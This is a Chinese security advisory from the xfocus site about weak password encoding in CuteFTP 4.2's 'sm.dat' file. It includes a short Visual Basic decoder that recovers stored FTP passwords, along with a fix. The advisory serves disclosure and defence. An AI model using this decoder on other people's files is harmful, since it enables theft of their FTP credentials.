xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

CuteFTP的密码加密不够强壮


发布时间:2001-08-25
更新时间:2001-08-25
严重程度:
威胁程度:口令恢复
错误类型:设计错误
利用方式:服务器模式

受影响系统
globalSCAPE CuteFTP 4.2
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 3.5.1
   - Microsoft Windows 2000
详细描述
CuteFTP是一个比较流行的WINDOWS平台下的FTP客户端程序,其中使用对密码的编码不够强壮,储存密码的文件叫'sm.dat',如果站点管理员密码没有设置的话就可以容易获得密码。

测试代码
'Decode a single character
Public Function CuteDecode(i_Asc As Integer)

CuteDecode = ((Not i_Asc) And 200) + (i_Asc And 55)

End Function

'Decode password
Public Function CuteDecodeString(str_password As String)

Dim i As Integer

CuteDecodeString = ""

For i = 1 To Len(str_password)
CuteDecodeString = CuteDecodeString + Chr$(CuteDecode(Asc(Mid(str_password, i, 1))))
Next i

End Function

解决方案
设置站点管理员密码对'sm.dat'进行完全加密。

相关信息
"E. van Elk" <evelk@dsv.nl>